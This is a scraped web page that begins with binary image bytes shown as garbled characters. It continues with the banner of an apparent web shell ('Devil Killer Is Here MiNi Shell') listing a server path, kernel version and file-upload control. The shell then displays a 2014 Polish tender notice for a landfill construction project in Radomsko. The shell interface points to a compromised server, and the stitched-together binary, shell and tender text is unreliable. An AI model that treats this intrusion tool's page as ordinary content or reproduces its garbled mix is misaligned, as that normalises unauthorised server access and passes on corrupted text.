JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140107/5194-N-2014.html

<p class="kh_header"><b>Radomsko: Budowa nowego składowiska balastu i odpadów posortowniczych na terenie Zakładu 
Unieszkodliwiania Odpadów Komunalnych w Płoszowie o pow. całkowitej 21.500 m2 
i chłonności 155 940 m3 ( kwatera nr 1 )</b><br>
<b>Numer ogłoszenia: 5194 - 2014; data zamieszczenia: 07.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka  z o.o. , ul. Stara Droga 85, 97-500 Radomsko, woj. łódzkie, tel. 044 6830630 w. 45, faks 044 6834377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-radomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. 100 % udziałów jest własnością gminy miasta Radomsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa nowego składowiska balastu i odpadów posortowniczych na terenie Zakładu 
Unieszkodliwiania Odpadów Komunalnych w Płoszowie o pow. całkowitej 21.500 m2 
i chłonności 155 940 m3 ( kwatera nr 1 ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia publicznego jest:
    Budowa nowego składowiska balastu i odpadów posortowniczych na terenie Zakładu 
       Unieszkodliwiania Odpadów Komunalnych w Płoszowie o pow. całkowitej 21.500 m2 
          i chłonności 155 940 m3 ( kwatera nr 1 ).

2. Zakres przedmiotu zamówienia obejmuje:
  - karczowanie i oczyszczenie terenu z gałęzi, korzeni, pni itp.;
  - ukształtowanie niecki przez wykonanie wykopów i nasypów do uzyskania niezbędnych   
     spadków skarp i dna;
  - uszczelnienie mineralne - glina, warstwa o grubości 0,50 m;
  - ukształtowanie obwałowania technologicznego;
  - uszczelnienie sztuczne - geomembrana PEHD 2,0 mm, gładka na dnie i fakturowana 
    ( szorstka ) na skarpach;
  - zabezpieczenie geomembrany - geowłóknina;
  - wykonanie dróg zjazdowych technologicznych dla samochodów dowożących odpady i   
    sprzętu technologicznego do kwatery oraz poboczy dla wjazdu kompaktora;
  - ułożenie drenażu z rur perforowanych PEHD O 300 mm na dnie i skarpach, wykonanie   
    szczelnych przejść przez uszczelnienie skarpy;
  - wykonanie rurociągu i studni połączeniowych poza obrysem uszczelnionej kwatery;
  - wykonanie pompowni odcieków, montaż zbiorników na odcieki, wykonanie głównej drogi  
    technologicznej wzdłuż kwater składowiska;
  - wykonanie studni odgazowujących na dnie składowiska;
  - wykonanie oświetlenia korony niecki oraz zasilania pompowni; 
  - uzyskanie pozwolenia na użytkowanie składowiska balastu i odpadów 
    posortowniczych;
 
3. Szczegółowy opis przedmiotu zamówienia zawiera:
 - projekt budowlany,
 - specyfikacja techniczna wykonania i odbioru robót,
  - przedmiary robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.21.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 100.000,00 PLN ( słownie: sto tysięcy złotych ).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 

Wadium może być wnoszone w jednej lub kilku następujących formach:
    1) pieniądzu; 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
        kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
        z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości       
       ( Dz. U. z 2007 r. Nr 42, poz. 275 ).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o 
        zamówienie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania 
        ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 
        jeden obiekt, w którym wartość robót ziemnych wynosiła minimum 2,5 mln zł brutto 
        ( słownie: dwa miliony pięćset tysięcy złotych ). 
        W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są 


        przedłożyć wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed 
        upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w 
        tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  
        załączeniem dowodów określających, czy roboty te zostały wykonane w sposób należyty 
        oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i 
        prawidłowo ukończone wg wzoru stanowiącego załącznik nr 4 do SIWZ.
       Dowody wskazujące czy roboty zostały wykonane w sposób należyty oraz zgodnie z 
       z zasadami sztuki budowlanej i prawidłowo ukończone winny dotyczyć robót 
       budowlanych wymienionych w wykazie.
        Dowodami zgodnie z § 1 ust. 2 pkt 1 i 2 rozporządzenia Prezesa Rady Ministrów z dnia 
        19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od 
        wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. 2013, 
        poz.231 ) są: poświadczenie lub w przypadku zamówień na roboty budowlane - inne  
        dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca 
        nie jest w stanie uzyskać poświadczenia. 
        Wykonawca, w miejsce poświadczeń, o których mowa § 1 ust. 2 pkt 1 rozporządzenia 
        Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, 
        jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą 
        być składane ( Dz.U.2013, poz.231 ), może przedkładać dokumenty potwierdzające
        wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe 
        ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 
        30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od 
        wykonawcy, oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 226, 
        poz.1817 ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie 
        Wykonawca jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonywania zamówienia  
         zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami 
         zdolnymi do wykonania zamówienia w następujących specjalnościach:
a) jedną osobą, która pełnić będzie funkcję kierownika robót w specjalności instalacyjnej w  
    zakresie sieci, instalacji wodociągowych i kanalizacyjnych, posiadającą określone 
    przepisami ustawy Prawo budowlane ( tj. Dz.U. z 2010 r., Nr 243, poz. 1623 ze zm.) 
    uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie 
    sieci, instalacji wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im 
    uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów 
    upoważniające do kierowania robotami budowlanymi w zakresie wymaganym do realizacji 
    niniejszego zamówienia. 
    Doświadczenie zawodowe - co najmniej 5 letnie doświadczenie w pracy w charakterze 
    kierownika budowy, kierownika robót.
b) jedną osobą, która pełnić będzie funkcję kierownika robót ( branża elektryczna ) 
    posiadającą określone przepisami ustawy Prawo budowlane ( tj. Dz.U. z 2010 r., Nr 243, 
    poz. 1623 ze zm.) uprawnienia do kierowania robotami budowlanymi w specjalności 
    instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
    bez ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie 
    wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi 
    w zakresie wymaganym do realizacji niniejszego zamówienia.
    Doświadczenie zawodowe - co najmniej 5 letnie doświadczenie w pracy w charakterze 
    kierownika budowy, kierownika robót.
c) jedną osobą, która pełnić będzie funkcję kierownika robót w specjalności konstrukcyjno-
    budowlanej w zakresie dróg, posiadającą określone przepisami ustawy Prawo budowlane 
    ( tj. Dz.U. z 2010 r., Nr 243, poz. 1623 ze zm.) uprawnienia do kierowania robotami 
    budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające 
    im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów 
    upoważniające do kierowania robotami budowlanymi w zakresie wymaganym do realizacji 
    niniejszego zamówienia. 
    Doświadczenie zawodowe - co najmniej 5 letnie doświadczenie w pracy w charakterze 
    kierownika budowy, kierownika robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za warunek spełniony, jeżeli Wykonawca wykaże że:
-  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    związanej z przedmiotem niniejszego zamówienia na kwotę co najmniej 3,0 mln zł 
    ( słownie: trzy miliony złotych ).
    Jeżeli polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony
    obejmuje okres krótszy niż termin realizacji zamówienia, Wykonawca składa 
    oświadczenie, że w przypadku wyboru jego oferty zobowiązuje się do przedłużenia 
    polisy na cały okres objęty zamówieniem oraz zobowiązuje się do przedkładania kolejnej 
    polisy Zamawiającemu w wypadku zakończenia okresu ubezpieczenia. 
    UWAGA!
     Do przeliczania wartości w walutach obcych określonych w dokumentach wskazanych  
     powyżej, podane kwoty będą przeliczane według średniego kursu walut NBP dla danej 
     waluty z dnia ukazania się ogłoszenia o przetargu w Biuletynie Zamówień Publicznych. 
  - posiada własne środki finansowe lub zdolność kredytową umożliwiającą realizację 
     zamówienia w wysokości nie mniejszej niż 3,0 mln zł ( słownie: trzy miliony złotych ).
     Na potwierdzenie spełnienia powyższego warunku Wykonawca jest zobowiązany  
     dołączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo -       
     kredytowej, w którym/których posiada rachunek, potwierdzający wysokość posiadanych 
     środków finansowych lub zdolność kredytową wystawioną nie wcześniej niż 3 miesiące 
     przed upływem terminu składania ofert.
  - osiągnął w każdym z ostatnich trzech lat obrotowych 2010-2012, a jeżeli okres 
     prowadzenia działalności jest krótszy - w tym okresie, średni obrót roczny rozumiany jako 
     przychód netto ze sprzedaży produktów, towarów i materiałów na poziomie nie niższym
     niż 10 mln zł ( słownie: dziesięć milionów złotych ).
     W celu potwierdzenia i weryfikacji przez Zamawiającego spełnienia powyższego  
     warunku ( tiret trzeci ) Wykonawcy zobowiązani są przedłożyć sprawozdanie 
     finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie 
     z przepisami o rachunkowości, również z opinią o badanym sprawozdaniu, a przypadku 
     Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych 
     dokumentów określających obroty oraz zobowiązania i należności za lata 2010-2012, 
     a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz Ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ.
2) Szczegółowy harmonogram rzeczowo-terminowo-finansowy realizacji przedmiotu 
      zamówienia w postaci tabelarycznej, uwzględniający poszczególne etapy, czasokresy i 
      zaangażowanie procentowe dla całego trwania kontraktu - według samodzielnie 
      napisanego załącznika.
      Harmonogram musi zawierać:
  -  podział przedmiotu zamówienia na poszczególne etapy, czasokresy, które mogą stanowić 
     osobny element odbioru częściowego,
  -  zaangażowanie procentowe,
  -  terminy wykonania wyszczególnionych części oraz ich ceny.
3) Oświadczenie Wykonawcy do wniesienia zabezpieczenia i formy należytego wykonania 
      umowy w przypadku uzyskania zamówienia w wysokości 10% ceny ofertowej brutto 
      podanej w ofercie - wg samodzielnie napisanego załącznika.
4) Zobowiązanie Wykonawcy w przypadku uzyskania zamówienia do ubezpieczenia 
      budowy i robót, na kwotę brutto zaoferowaną w przetargu z tytułu szkód, które mogą 
      zaistnieć w związku z określonymi zdarzeniami losowymi oraz odpowiedzialności 
      cywilnej - według samodzielnie napisanego załącznika.
5) Wykaz części zamówienia, które Wykonawca zamierza zlecić podwykonawcom. Wzór 
       wykazu znajduje się w załączniku nr 6 do SIWZ. 
6) Zaparafowany przez Wykonawcę projekt umowy. Wzór projektu znajduje się w 
      załączniku nr 7 do SIWZ. 
7) Wykaz elementów rozliczeniowych w układzie tabelarycznym za wykonanie  
       poszczególnych elementów oraz innych świadczeń koniecznych do wykonania 
       przedmiotu zamówienia - wg samodzielnie napisanego załącznika.
       Wykaz musi zawierać bazę cenowo-kosztorysową na podstawie, której Wykonawca 
       wyliczył wartość robót zawierającą dane dotyczące:
     - roboczogodziny ( R ) -      zł/godz.
     - narzutu kosztów pośrednich ( Kp ) -     % ( od R, S ),
     - narzutu kosztów zakupu ( Kz ) -       % ( od M ),
     - narzutu zysku ( Z ) -      % ( od R+S+Kp ).
8) Dowód wniesienia wadium.
9) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach 
    zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, 
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej 
    sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami 
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu 
    oryginał dokumentu pisemnego zobowiązania tych podmiotów do oddania mu do 
    dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, 
    podpisany przez osoby upoważnione do reprezentacji tych podmiotów.
